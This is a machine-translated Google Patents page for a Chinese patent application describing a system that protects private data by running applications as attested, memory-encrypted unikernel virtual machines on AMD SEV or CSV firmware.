CN116975912A - Private data protection system, method, device and readable storage medium - Google Patents

Private data protection system, method, device and readable storage medium Download PDF

Info

Publication number
CN116975912A
CN116975912A CN202310917847.5A CN202310917847A CN116975912A CN 116975912 A CN116975912 A CN 116975912A CN 202310917847 A CN202310917847 A CN 202310917847A CN 116975912 A CN116975912 A CN 116975912A
Authority
CN
China
Prior art keywords
target application
private data
data protection
application program
module
Prior art date
Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
Pending
Application number
CN202310917847.5A
Other languages
Chinese (zh)
Inventor
孟庆树
彭修杰
陈志军
周晶
董逢华
Current Assignee (The listed assignees may be inaccurate. Google has not performed a legal analysis and makes no representation or warranty as to the accuracy of the list.)
Wuhan Tianyu Information Industry Co Ltd
Original Assignee
Wuhan Tianyu Information Industry Co Ltd
Priority date (The priority date is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the date listed.)
Filing date
Publication date
Application filed by Wuhan Tianyu Information Industry Co Ltd filed Critical Wuhan Tianyu Information Industry Co Ltd
Priority to CN202310917847.5A priority Critical patent/CN116975912A/en
Publication of CN116975912A publication Critical patent/CN116975912A/en
Pending legal-status Critical Current

Links

Classifications

    • GPHYSICS
    • G06COMPUTING; CALCULATING OR COUNTING
    • G06FELECTRIC DIGITAL DATA PROCESSING
    • G06F21/00Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
    • G06F21/60Protecting data
    • G06F21/62Protecting access to data via a platform, e.g. using keys or access control rules
    • G06F21/6218Protecting access to data via a platform, e.g. using keys or access control rules to a system of files or objects, e.g. local or distributed file system or database
    • G06F21/6245Protecting personal data, e.g. for financial or medical purposes
    • GPHYSICS
    • G06COMPUTING; CALCULATING OR COUNTING
    • G06FELECTRIC DIGITAL DATA PROCESSING
    • G06F21/00Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
    • G06F21/50Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
    • G06F21/52Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems during program execution, e.g. stack integrity ; Preventing unwanted data erasure; Buffer overflow
    • G06F21/53Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems during program execution, e.g. stack integrity ; Preventing unwanted data erasure; Buffer overflow by executing in a restricted environment, e.g. sandbox or secure virtual machine
    • GPHYSICS
    • G06COMPUTING; CALCULATING OR COUNTING
    • G06FELECTRIC DIGITAL DATA PROCESSING
    • G06F21/00Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
    • G06F21/50Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
    • G06F21/57Certifying or maintaining trusted computer platforms, e.g. secure boots or power-downs, version controls, system software checks, secure updates or assessing vulnerabilities
    • G06F21/572Secure firmware programming, e.g. of basic input output system [BIOS]
    • GPHYSICS
    • G06COMPUTING; CALCULATING OR COUNTING
    • G06FELECTRIC DIGITAL DATA PROCESSING
    • G06F21/00Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
    • G06F21/60Protecting data
    • G06F21/602Providing cryptographic facilities or services
    • GPHYSICS
    • G06COMPUTING; CALCULATING OR COUNTING
    • G06FELECTRIC DIGITAL DATA PROCESSING
    • G06F8/00Arrangements for software engineering
    • G06F8/60Software deployment
    • G06F8/61Installation
    • G06F8/63Image based installation; Cloning; Build to order
    • GPHYSICS
    • G06COMPUTING; CALCULATING OR COUNTING
    • G06FELECTRIC DIGITAL DATA PROCESSING
    • G06F9/00Arrangements for program control, e.g. control units
    • G06F9/06Arrangements for program control, e.g. control units using stored programs, i.e. using an internal store of processing equipment to receive or retain programs
    • G06F9/44Arrangements for executing specific programs
    • G06F9/455Emulation; Interpretation; Software simulation, e.g. virtualisation or emulation of application or operating system execution engines
    • G06F9/45533Hypervisors; Virtual machine monitors
    • G06F9/45558Hypervisor-specific management and integration aspects
    • GPHYSICS
    • G06COMPUTING; CALCULATING OR COUNTING
    • G06FELECTRIC DIGITAL DATA PROCESSING
    • G06F9/00Arrangements for program control, e.g. control units
    • G06F9/06Arrangements for program control, e.g. control units using stored programs, i.e. using an internal store of processing equipment to receive or retain programs
    • G06F9/44Arrangements for executing specific programs
    • G06F9/455Emulation; Interpretation; Software simulation, e.g. virtualisation or emulation of application or operating system execution engines
    • G06F9/45533Hypervisors; Virtual machine monitors
    • G06F9/45558Hypervisor-specific management and integration aspects
    • G06F2009/45587Isolation or security of virtual machine instances

Landscapes

  • Engineering & Computer Science (AREA)
  • Theoretical Computer Science (AREA)
  • Software Systems (AREA)
  • General Engineering & Computer Science (AREA)
  • Computer Security & Cryptography (AREA)
  • General Physics & Mathematics (AREA)
  • Physics & Mathematics (AREA)
  • Computer Hardware Design (AREA)
  • Health & Medical Sciences (AREA)
  • General Health & Medical Sciences (AREA)
  • Bioethics (AREA)
  • Databases & Information Systems (AREA)
  • Medical Informatics (AREA)
  • Storage Device Security (AREA)

Abstract

The invention provides a privacy data protection system, a privacy data protection method, privacy data protection equipment and a privacy data protection readable storage medium. The packaging module is used for packaging the target application program, the library depending on the target application program and the system call into an image file, and the image file is used as running software of the virtual machine. The security firmware is used for encrypting and decrypting the memory of the virtual machine, carrying out integrity measurement on the image file, and starting the virtual machine if the measurement passes. The acquisition module is arranged in the target application program and used for acquiring a remote report from the security firmware and sending the remote report to the first checking module, wherein the remote report is generated by the security firmware and contains the measurement value of the image file. The first checking module is used for checking the metric value in the remote report, so that the data provider can provide private data to the target application program after the metric value passes the check. The invention simultaneously meets the security requirement of the private data and the efficiency requirement of the execution process.

Description

Private data protection system, method, device and readable storage medium
Technical Field
The present invention relates to the field of information security technologies, and in particular, to a system, a method, an apparatus, and a readable storage medium for protecting private data.
Background
Privacy computing has three technical routes, namely, safe multiparty computing, federal learning and Trusted Execution Environment (TEE), wherein the technical route based on TEE is concerned by industries and academia due to the fact that the efficiency is high, the supported computing logic is complete, and the actual landing is obtained. However, the current TEE scheme for the privacy computing scenario has either a problem of data leakage or a problem of execution efficiency, and cannot meet the security requirement of the privacy data and the efficiency requirement of the execution process at the same time.
Disclosure of Invention
The invention mainly aims to provide a privacy data protection system, a privacy data protection method, privacy data protection equipment and a privacy data protection readable storage medium, and aims to solve the technical problem that a TEE scheme aiming at a privacy computing scene in the related art cannot meet the safety requirement of privacy data and the efficiency requirement of an execution process at the same time.
In a first aspect, the present invention provides a private data protection system, the private data protection system including a packaging module, a virtual machine, a secure firmware, an acquisition module, and a first inspection module;
the packaging module is used for packaging the target application program, the library depending on the target application program and the system call into an image file, and the image file is used as the running software of the virtual machine;
the security firmware is arranged in a CPU of the host machine and used for encrypting and decrypting the memory of the virtual machine, carrying out integrity measurement on the image file, and starting the virtual machine if the measurement passes;
the acquisition module is arranged in the target application program and is used for acquiring a remote report from the secure firmware and sending the remote report to the first inspection module, wherein the remote report is generated by the secure firmware and contains the measurement value of the image file;
the first checking module is configured to check the metric value in the remote report for a data provider to provide private data to the target application after the metric value check passes.
Further, in an embodiment, the private data protection system further includes a second checking module;
and the second checking module is used for checking the function of the source code corresponding to the target application program and the library and the system call which the target application program depends on before the target application program is packaged, and outputting an alarm prompt if checking the network call function abnormality of the source code or checking the file writing function abnormality of the source code.
Further, in an embodiment, the first checking module is further configured to determine, according to the metric value, the target application program and its dependent library and system call corresponding source code and check a function of the source code after the metric value passes the checking, so that the data provider provides private data to the target application program after the source code function passes the checking.
Further, in an embodiment, the secure firmware is further configured to sign a target data structure, the target data structure containing the metric value, the remote report further containing the signature;
the acquisition module is further used for checking the signature in the remote report, and if the signature passes the check, the remote report is sent to the first checking module.
Further, in an embodiment, the private data protection system further includes an encrypted data disk;
the encrypted data disk is used for carrying out encrypted storage on data which needs to be durable when the target application program runs, wherein a secret key is bound with a system state, and the secret key is effective when the current state of the system is consistent with the system state when the secret key is bound.
Further, in an embodiment, the packaging module compiles the target application program based on the library operating system to form an unikernel image.
Further, in an embodiment, the security firmware performs integrity measurement on the image file and encrypts and decrypts the memory of the virtual machine based on an amds ev technology or a marine CSV technology.
In a second aspect, the present invention further provides a method for protecting private data, which is applied to a private data protection system including a packaging module, a virtual machine, a secure firmware, an acquisition module, and a first checking module, where the method for protecting private data includes:
the packaging module packages the target application program, the library depending on the target application program and the system call into an image file, wherein the image file is used as the running software of the virtual machine;
the security firmware encrypts and decrypts the memory of the virtual machine, carries out integrity measurement on the image file, and starts the virtual machine if the measurement passes, wherein the security firmware is arranged in a CPU of a host machine;
the acquisition module acquires a remote report from the secure firmware and sends the remote report to the first inspection module, wherein the acquisition module is arranged in the target application program, and the remote report is generated by the secure firmware and contains a measurement value of the image file;
the first inspection module inspects the metrics in the remote report for a data provider to provide private data to the target application after the metrics inspection passes.
In a third aspect, the present invention also provides a private data protection apparatus, the private data protection apparatus including a processor, a memory, and a private data protection program stored on the memory and executable by the processor, wherein the private data protection program, when executed by the processor, implements the steps of the above-described private data protection method.
In a fourth aspect, the present invention further provides a readable storage medium having stored thereon a privacy data protecting program, wherein the privacy data protecting program, when executed by a processor, implements the steps of the above-described privacy data protecting method.
The invention realizes multiple guarantees in the use process of the target application program: the target application program, the library and the system call which are depended on the target application program are packaged into image files, the image files are used as running software of the virtual machine, the system call can be directly executed in the target application program, the problem of data leakage caused by external running system call is avoided, and the target application program is ensured not to be accessed by any other entity from the virtual machine; the security firmware carries out integrity measurement on the image file, and the measurement value is used for confirming the integrity of the image file when the virtual machine is started on one hand and proving the credibility of the application running environment to the data provider on the other hand; the secure firmware encrypts and decrypts the memory of the virtual machine, so that the host machine or other virtual machines cannot access the memory data of the virtual machine, and attacks from the outside of the virtual machine are stopped. In addition, the invention does not depend on instruction simulation, does not need to repeatedly modify the kernel of the virtual machine, and fully utilizes the high efficiency of the technical route of the virtual machine. Therefore, the invention meets the security requirement of the private data and the efficiency requirement of the execution process at the same time.
Drawings
FIG. 1 is a schematic diagram of a private data protection system according to an embodiment of the invention;
FIG. 2 is a schematic diagram of a private data protection system according to another embodiment of the present invention;
FIG. 3 is a flowchart illustrating a method for protecting private data according to an embodiment of the present invention;
fig. 4 is a schematic hardware structure of a private data protection device according to an embodiment of the invention.
The achievement of the objects, functional features and advantages of the present invention will be further described with reference to the accompanying drawings, in conjunction with the embodiments.
Detailed Description
It should be understood that the specific embodiments described herein are for purposes of illustration only and are not intended to limit the scope of the invention.
The inventor performs security threat research on the TEE scheme aiming at the privacy computing scene at present, analyzes the problems existing in each scheme, and has the following conditions:
intel introduced an SGXenclave-based TEE scheme for protecting the security and privacy of code and data of applications, providing application-level isolation. However, the execution efficiency of the SGX scheme is lower, and the performance loss is 3-6 times in a computing task according to the best test data of a library operating system Occlum which supports SGXenclave application development at present. Intelencslave also has a constraint that system calls cannot be directly executed, such as input-output related system calls, file system related system calls, and the like. For system calls, intelencslave can only execute these system calls outside encslave through the OCALL mechanism. In the scheme, the problem of data leakage exists in a privacy computing scene, for example, in the privacy computing scene of data annotation, the system call of the annotated data output to a screen can cause the annotated data to leak out of an enclaspe.
AMD has proposed the TEE scheme based on SEV, and this scheme has the performance loss little compared with Intel SGXenclave, and execution efficiency is high, and the application development is transplanted easily's advantage. SEV is mainly applied to cloud computing scenarios, where security issues exist when used to process private data. The SEV encrypts and isolates the SEV by taking the virtual machine as a unit, so that a host machine or other virtual machines cannot access the memory data of the target virtual machine, and the security of the data of the cloud tenant in the SEV is protected. When the SEV is used in the private computing scenario, since the internal programs of the virtual machine are not isolated, the owner of the SEV has many means to perform attacks, so that the user data in the TEE is no longer secure, resulting in data leakage.
Similarly, since the TEE of ARM allows multiple applications to run simultaneously, the target application within the TEE also has attack problems from other applications within the TEE.
Aiming at the problem of application protection based on a virtual machine, a research team in 2019 Germany designs a SEVGuard system for the purpose of application confidentiality protection, directly calls a KVM API of a host to construct a very small virtual machine, encrypts the memory of the virtual machine by utilizing the memory encryption function of the SEV, and enables a target application to run in the virtual machine to achieve the purpose of protecting the application, and the required system call is provided by the host system.
In 2020, shanghai great research team designs an enclassor system as Guest OS of an SEV virtual machine based on the collaborative design of software and hardware, and is responsible for constructing, managing and scheduling isolated enclaspes in the secure encryption virtual machine SEV, so that a security sensitive target application runs in the enclaspes to achieve the purpose of isolating and protecting the application, and system function call required by the target application is provided by an external common virtual machine system.
The two systems, namely the SEVGuard and the Enclaviser, have good protection on the application in a cloud environment, and other programs cannot obtain data privacy from the system. However, in a privacy computing scenario, the data provider is not trusted by any entity, including the owner of the application, which is a new threat model discovered by the inventors in the privacy computing scenario. If the new threat model is employed for analysis, then the external system running the dynamic link library or system function call is also not trusted, as either the malicious normal virtual machine (running the host application) or the malicious host system (running the SEVGuard) can infer the information of the original data by relying on the parameters passed upon the call or system function call.
The VSGX system is proposed by the research team of university of Ohio and south science and technology university in 2022, a virtual SGX is directly designed on the SEV, the isolation of the application level can be realized objectively, but the problem of relatively reduced efficiency exists, and meanwhile, the problem of data leakage caused by external operation of system call existing in Intelencleave also exists.
In 2023, a research team proposes a method for protecting the system environment and the application environment on which the target application runs to protect the safety of the target application, and the problem with this scheme is that when SEV runs different applications, the kernel of the operating system needs to be modified and compiled again, so as to affect the execution efficiency.
Therefore, the existing TEE scheme aiming at the privacy computing scene has the problems of data leakage or execution efficiency, and cannot meet the security requirement of privacy data and the efficiency requirement of the execution process at the same time.
In order to solve the above technical problems in the related art, the present invention provides a system, a method, a device and a readable storage medium for protecting private data, which simultaneously satisfy the security requirement of the private data and the efficiency requirement of the execution process.
In a first aspect, an embodiment of the present invention provides a private data protection system.
Fig. 1 is a schematic diagram illustrating a configuration of a private data protection system according to an embodiment of the present invention, and fig. 2 is a schematic diagram illustrating a configuration of a private data protection system according to another embodiment of the present invention.
Referring to fig. 1 and 2, in one embodiment, a privacy data protection system includes a packaging module, a virtual machine, a secure firmware, an acquisition module, and a first inspection module. The packaging module is used for packaging the target application program, the library depending on the target application program and the system call into an image file, and the image file is used as running software of the virtual machine. The security firmware is arranged in the CPU of the host machine and used for encrypting and decrypting the memory of the virtual machine, carrying out integrity measurement on the image file, and starting the virtual machine if the measurement passes. The acquisition module is arranged in the target application program and used for acquiring a remote report from the security firmware and sending the remote report to the first checking module, wherein the remote report is generated by the security firmware and contains the measurement value of the image file. The first checking module is used for checking the metric value in the remote report, so that the data provider can provide private data to the target application program after the metric value passes the check.
Specifically, the privacy data protection system in the embodiment relates to three different types of users in a privacy computing scene, which are respectively an application developer, an application user and a data provider. The target application program is an application program in a privacy computing scene, and the use of private data is involved in the running process. And the application developer packages the target application program, the library depending on the target application program and the system call into an image file through a packaging module and provides the image file for the application user. The application user takes the image file as running software of the virtual machine, encrypts and decrypts the memory of the virtual machine through the safety firmware arranged in the host CPU, and measures the integrity of the image file. The data provider applies for obtaining a remote report from the secure firmware through an obtaining module in the target application program, the secure firmware generates a remote report containing the image file measurement value based on the application, the first checking module checks the measurement value in the remote report, and the private data is provided to the application user after the measurement value check is passed.
Therefore, the embodiment realizes multiple guarantees in the use process of the target application program: the target application program, the library and the system call which are depended on the target application program are packaged into image files, the image files are used as running software of the virtual machine, the system call can be directly executed in the target application program, the problem of data leakage caused by external running system call is avoided, and the target application program is ensured not to be accessed by any other entity from the virtual machine; the security firmware carries out integrity measurement on the image file, and the measurement value is used for confirming the integrity of the image file when the virtual machine is started on one hand and proving the credibility of the application running environment to the data provider on the other hand; the secure firmware encrypts and decrypts the memory of the virtual machine, so that the host machine or other virtual machines cannot access the memory data of the virtual machine, and attacks from the outside of the virtual machine are stopped. In addition, the embodiment does not depend on instruction simulation, does not need to repeatedly modify the virtual machine kernel, and fully utilizes the high efficiency of the virtual machine technical route. Therefore, the embodiment meets the security requirement of the private data and the efficiency requirement of the execution process at the same time.
Optionally, the privacy data protection scheme of the present invention may protect privacy data in combination with other techniques for certain specific privacy computing scenarios. For example, for a privacy computing application scenario, data tagging for AI training services, the data tagging application aggregates data from different principals, each principal having a need for privacy protection of the data. By applying the scheme to carry out data annotation, the marked data can be prevented from being directly leaked. Aiming at the problem of visual leakage, the problems of visual leakage can be solved by technologies such as photographing prevention and the like.
With continued reference to fig. 2, in a further embodiment, the private data protection system further includes a second inspection module. And the second checking module is used for checking the functions of the source codes corresponding to the target application program and the library and the system which the target application program depends on before the target application program is packaged, and outputting an alarm prompt if checking the network calling function abnormality of the source codes or checking the file writing function abnormality of the source codes.
In this embodiment, in order to solve the problem of the expansion of the attack surface caused by introducing all the dependency library and the system call into the TEE, a second inspection module is added. The application developer needs to perform function inspection on the target application program and the library and the source code corresponding to the system call which are depended on by the target application program through the second inspection module, so that the function of the target application program meets the expectations, and after the inspection is passed, an image file is generated through the packaging module. In particular, the network calling function is checked, so that the network calling function is ensured not to be used for sending unexpected data, and data leakage caused by unexpected accidents is avoided. The write file function is also checked to ensure that the write file function is not used for malicious illegally storing data. If the network call function of the source code is checked to be abnormal or the function of the writing file of the source code is checked to be abnormal, outputting an alarm prompt to remind an application developer to take solving measures. Alternatively, the network function check, write file function check may be matched based on keywords, which are required depending on the application programming tool.
Further, in an embodiment, the first checking module is further configured to determine, after the checking of the metric value is passed, the target application program and the library and the system that the target application program depends on call the corresponding source code according to the metric value, and check the function of the source code, so that the data provider provides the privacy data for the target application program after the checking of the source code function is passed.
In this embodiment, since no trusted third party exists, in order to further improve the security of the private data, a source code checking function is newly added to the second checking module. Before providing the privacy data, the data provider firstly checks the measurement value, after the measurement value is checked, the corresponding target application program is determined by the bioavailability value, the source code is checked to ensure that the function (especially the network calling function and the file writing function) accords with the expectation, and the privacy data can be provided for the target application program after the source code function is checked. It should be noted that, in order to ensure implementation of the above functions, the target application needs to source the data provider.
Further, in one embodiment, the secure firmware is further configured to sign a target data structure, the target data structure comprising the measurement value of the image file, and the remote report further comprising the signature. The acquisition module is also used for checking the signature in the remote report, and if the signature passes, the remote report is sent to the first checking module.
In this embodiment, the target data structure may include a chip ID, an externally input random number, and the like in addition to the metric value. The acquisition module needs to check the signature before issuing the remote report, confirming that it is from a trusted hardware platform. Specifically, the secure firmware signs the target data structure with the platform endorsement key PEK (platformendorsekey) representing the TEE platform identity, the acquisition module checks the signature in the remote report with the public key in the public key certificate, and verifies the validity of the certificate with the certificate chain.
Further, in an embodiment, the private data protection system further comprises an encrypted data disk. The encrypted data disk is used for carrying out encrypted storage on data needing to be durable when the target application program runs, wherein the secret key is bound with the system state, and the secret key is effective when the current state of the system is consistent with the system state when the secret key is bound. Therefore, the encryption and decryption operation can be performed by using the key only when the current state of the system is consistent with the system state when the key is bound, and the data security is further ensured.
Further, in one embodiment, the packaging module compiles the target application based on the library operating system to form an unikernel image. The library operating system (LibOS) based technology ensures that only one application exists in the unikernel mirror image, thereby achieving the purpose of application isolation. LibOS provides the functions of dependency libraries, system calls, etc. required by the application. In other embodiments, the RTOS and related applications may also be made as image files.
Further, in an embodiment, the security firmware performs integrity measurement on the image file and encrypts and decrypts the memory of the virtual machine based on the amdev technology or the marine CSV technology.
In this embodiment, the privacy data protection system uses the CPU architecture provided by the amdev technology or the marine CSV technology, where firmware in the CPU can perform integrity measurement on the image file and encrypt and decrypt the memory of the virtual machine, and on this basis, add a remote report generating function, so as to obtain the security firmware and the virtual machine required in the present invention. Of course, in other embodiments, firmware having the above functions may be rearranged based on an existing CPU architecture. The firmware can produce symmetric keys and asymmetric keys, and is added with a symmetric password execution engine, and the firmware automatically encrypts and decrypts the memory of the virtual machine so as to prevent attacks from a host and other virtual machines, and simultaneously, the attacks of an attacker on an application by utilizing a dynamic link library and loopholes of a system call function can be reduced.
In a second aspect, an embodiment of the present invention further provides a method for protecting private data, which is applied to a private data protection system including a packaging module, a virtual machine, a secure firmware, an obtaining module, and a first checking module.
Fig. 3 is a flow chart illustrating a method for protecting private data according to an embodiment of the invention.
Referring to fig. 3, in one embodiment, the method for protecting private data includes:
s11, a packaging module packages a target application program, a library depending on the target application program and a system call into an image file, wherein the image file is used as running software of a virtual machine;
s12, encrypting and decrypting the memory of the virtual machine by the safety firmware, carrying out integrity measurement on the image file, and starting the virtual machine if the measurement passes, wherein the safety firmware is arranged in a CPU of the host machine;
s13, an acquisition module acquires a remote report from the security firmware and sends the remote report to a first inspection module, wherein the acquisition module is arranged in a target application program, and the remote report is generated by the security firmware and contains a measurement value of an image file;
s14, the first checking module checks the measurement value in the remote report so that the data provider can provide private data for the target application program after the measurement value passes the check.
Further, in an embodiment, the private data protection system further includes a second checking module;
before the step of packaging the target application program, the library and the system call which the target application program depends on into the mirror image file by the packaging module, the method further comprises the following steps:
and the second checking module checks the function of the source code corresponding to the target application program, the library and the system call which the target application program depends on, and if the network call function of the source code is checked to be abnormal or the function of the writing file is checked to be abnormal, an alarm prompt is output.
Further, in an embodiment, after the step of checking the metric value in the remote report by the first checking module, the method further includes:
the first checking module determines the target application program and the library and system which the target application program depends on according to the metric value, calls the corresponding source code and checks the function of the source code, so that the data provider can provide privacy data for the target application program after the source code function check is passed.
Further, in an embodiment, the secure firmware is further configured to sign a target data structure, the target data structure including the metric value, and the remote report further including the signature;
the step of sending the remote report to the first inspection module comprises:
the acquisition module performs signature verification on the signature in the remote report, and if the signature verification passes, the remote report is sent to the first inspection module.
Further, in an embodiment, the private data protection system further includes an encrypted data disk;
the method for protecting the privacy data further comprises the following steps:
the encryption data disk encrypts and stores data which needs to be durable when the target application program runs, wherein the key is bound with the system state, and the key is effective when the current state of the system is consistent with the system state when the key is bound.
Further, in one embodiment, the packaging module compiles the target application based on the library operating system to form an unikernel image.
Further, in an embodiment, the security firmware performs integrity measurement on the image file and encrypts and decrypts the memory of the virtual machine based on the amdev technology or the marine CSV technology.
The analysis of each step in the method for protecting private data corresponds to the functions and implementation processes of each component in the system for protecting private data, which are not described in detail herein.
In a third aspect, an embodiment of the present invention provides a private data protection apparatus, which may be an apparatus having a data processing function, such as a Personal Computer (PC), a notebook computer, a server, or the like.
Fig. 4 is a schematic diagram of a hardware structure of a private data protection device according to an embodiment of the present invention.
Referring to fig. 4, in an embodiment of the present invention, the private data protection device may include a processor 1001 (e.g., a central processor CentralProcessingUnit, CPU), a communication bus 1002, a user interface 1003, a network interface 1004, and a memory 1005. Wherein the communication bus 1002 is used to enable connected communications between these components; the user interface 1003 may include a Display screen (Display), an input unit such as a Keyboard (Keyboard); the network interface 1004 may optionally include a standard wired interface, a WIreless interface (e.g., WIreless-FIdelity, WI-FI interface); the memory 1005 may be a high-speed Random Access Memory (RAM) or a stable memory (non-volatile memory), such as a disk memory, and the memory 1005 may alternatively be a storage device independent of the processor 1001. Those skilled in the art will appreciate that the hardware configuration shown in fig. 4 is not limiting of the invention and may include more or fewer components than shown, or may combine certain components, or a different arrangement of components.
With continued reference to fig. 4, an operating system, a network communication module, a user interface module, and a privacy data protection program may be included in the memory 1005 of fig. 4, which is a type of computer storage medium. The processor 1001 may call a private data protection program stored in the memory 1005 and execute the private data protection method provided by the embodiment of the present invention.
In a fourth aspect, embodiments of the present invention also provide a readable storage medium.
The invention stores a privacy data protection program on a readable storage medium, wherein the privacy data protection program realizes the steps of the privacy data protection method when being executed by a processor.
The method implemented when the privacy data protection program is executed may refer to various embodiments of the privacy data protection method of the present invention, and will not be described herein.
It should be noted that, in this document, the terms "comprises," "comprising," or any other variation thereof, are intended to cover a non-exclusive inclusion, such that a process, method, article, or system that comprises a list of elements does not include only those elements but may include other elements not expressly listed or inherent to such process, method, article, or system. Without further limitation, an element defined by the phrase "comprising one … …" does not exclude the presence of other like elements in a process, method, article, or system that comprises the element.
The foregoing embodiment numbers of the present invention are merely for the purpose of description, and do not represent the advantages or disadvantages of the embodiments.
From the above description of the embodiments, it will be clear to those skilled in the art that the above-described embodiment method may be implemented by means of software plus a necessary general hardware platform, but of course may also be implemented by means of hardware, but in many cases the former is a preferred embodiment. Based on such understanding, the technical solution of the present invention may be embodied essentially or in a part contributing to the prior art in the form of a software product stored in a storage medium (e.g. ROM/RAM, magnetic disk, optical disk) as described above, comprising several instructions for causing a terminal device to perform the method according to the embodiments of the present invention.
The foregoing description is only of the preferred embodiments of the present invention, and is not intended to limit the scope of the invention, but rather is intended to cover any equivalents of the structures or equivalent processes disclosed herein or in the alternative, which may be employed directly or indirectly in other related arts.

Claims (10)

1. The privacy data protection system is characterized by comprising a packaging module, a virtual machine, a safety firmware, an acquisition module and a first checking module;
the packaging module is used for packaging the target application program, the library depending on the target application program and the system call into an image file, and the image file is used as the running software of the virtual machine;
the security firmware is arranged in a CPU of the host machine and used for encrypting and decrypting the memory of the virtual machine, carrying out integrity measurement on the image file, and starting the virtual machine if the measurement passes;
the acquisition module is arranged in the target application program and is used for acquiring a remote report from the secure firmware and sending the remote report to the first inspection module, wherein the remote report is generated by the secure firmware and contains the measurement value of the image file;
the first checking module is configured to check the metric value in the remote report for a data provider to provide private data to the target application after the metric value check passes.
2. The private data protection system of claim 1, further comprising a second inspection module;
and the second checking module is used for checking the function of the source code corresponding to the target application program and the library and the system call which the target application program depends on before the target application program is packaged, and outputting an alarm prompt if checking the network call function abnormality of the source code or checking the file writing function abnormality of the source code.
3. The private data protection system of claim 2, wherein the first checking module is further configured to determine, based on the metric, the target application and its dependent library and system call corresponding source code and check a function of the source code after the metric is checked, so that the data provider provides private data to the target application after the source code function check is passed.
4. The privacy data protection system of claim 1, wherein the secure firmware is further to sign a target data structure, the target data structure containing the metric value, the remote report further containing the signature;
the acquisition module is further used for checking the signature in the remote report, and if the signature passes the check, the remote report is sent to the first checking module.
5. The private data protection system of claim 1, wherein the private data protection system further comprises an encrypted data disk;
the encrypted data disk is used for carrying out encrypted storage on data which needs to be durable when the target application program runs, wherein a secret key is bound with a system state, and the secret key is effective when the current state of the system is consistent with the system state when the secret key is bound.
6. The private data protection system of any one of claims 1 to 5, wherein the packaging module compiles the target application based on a library operating system to form an unikernel image.
7. The privacy data protection system of any of claims 1-5, wherein the secure firmware performs integrity metrics on the image file and encrypts and decrypts memory of the virtual machine based on amds ev technology or marine CSV technology.
8. A method for protecting private data, which is applied to a private data protection system comprising a packaging module, a virtual machine, a security firmware, an acquisition module and a first checking module, the method for protecting private data comprises the following steps:
the packaging module packages the target application program, the library depending on the target application program and the system call into an image file, wherein the image file is used as the running software of the virtual machine;
the security firmware encrypts and decrypts the memory of the virtual machine, carries out integrity measurement on the image file, and starts the virtual machine if the measurement passes, wherein the security firmware is arranged in a CPU of a host machine;
the acquisition module acquires a remote report from the secure firmware and sends the remote report to the first inspection module, wherein the acquisition module is arranged in the target application program, and the remote report is generated by the secure firmware and contains a measurement value of the image file;
the first inspection module inspects the metrics in the remote report for a data provider to provide private data to the target application after the metrics inspection passes.
9. A private data protection device comprising a processor, a memory, and a private data protection program stored on the memory and executable by the processor, wherein the private data protection program, when executed by the processor, implements the steps of the private data protection method of claim 8.
10. A readable storage medium, wherein a private data protection program is stored on the readable storage medium, wherein the private data protection program, when executed by a processor, implements the steps of the private data protection method of claim 8.
CN202310917847.5A 2023-07-25 2023-07-25 Private data protection system, method, device and readable storage medium Pending CN116975912A (en)

Priority Applications (1)

Application Number Priority Date Filing Date Title
CN202310917847.5A CN116975912A (en) 2023-07-25 2023-07-25 Private data protection system, method, device and readable storage medium

Applications Claiming Priority (1)

Application Number Priority Date Filing Date Title
CN202310917847.5A CN116975912A (en) 2023-07-25 2023-07-25 Private data protection system, method, device and readable storage medium

Publications (1)

Publication Number Publication Date
CN116975912A true CN116975912A (en) 2023-10-31

Family

ID=88478972

Family Applications (1)

Application Number Title Priority Date Filing Date
CN202310917847.5A Pending CN116975912A (en) 2023-07-25 2023-07-25 Private data protection system, method, device and readable storage medium

Country Status (1)

Country Link
CN (1) CN116975912A (en)

Similar Documents

Publication Publication Date Title
KR102447251B1 (en) Unsealing data as a sealing enclave
RU2759302C2 (en) Cross-platform enclave identification information
KR102510273B1 (en) Data sealing as a sealing enclave
US10148442B2 (en) End-to-end security for hardware running verified software
Jung et al. Repackaging attack on android banking applications and its countermeasures
Anati et al. Innovative technology for CPU based attestation and sealing
KR102466793B1 (en) Abstract Enclave Identity
US20120216242A1 (en) Systems and Methods for Enhanced Security in Wireless Communication
CN105745661A (en) Policy-based trusted inspection of rights managed content
KR20030082485A (en) Saving and retrieving data based on symmetric key encryption
KR20030082484A (en) Saving and retrieving data based on public key encryption
SG189388A1 (en) Cryptographic system and methodology for securing software cryptography
CN109960903A (en) A kind of method, apparatus, electronic equipment and storage medium that application is reinforced
WO2023029447A1 (en) Model protection method, device, apparatus, system and storage medium
Fan et al. Fine-grained access control based on trusted execution environment
Liu et al. $ LiveForen $: Ensuring Live Forensic Integrity in the Cloud
CN113704211B (en) Data query method and device, electronic equipment and storage medium
Tedeschi et al. Information security and threats in mobile appliances
Khan et al. A protocol for preventing insider attacks in untrusted infrastructure-as-a-service clouds
Park et al. TGVisor: A tiny hypervisor-based trusted geolocation framework for mobile cloud clients
Lee et al. Classification and analysis of security techniques for the user terminal area in the internet banking service
Wang et al. TVIDS: Trusted virtual IDS with SGX
KR102403014B1 (en) Method for preventing forgery of clould container image and checking vulnerability diagnosis
CN116975912A (en) Private data protection system, method, device and readable storage medium
Severinsen Secure programming with intel sgx and novel applications

Legal Events

Date Code Title Description
PB01 Publication
PB01 Publication
SE01 Entry into force of request for substantive examination
SE01 Entry into force of request for substantive examination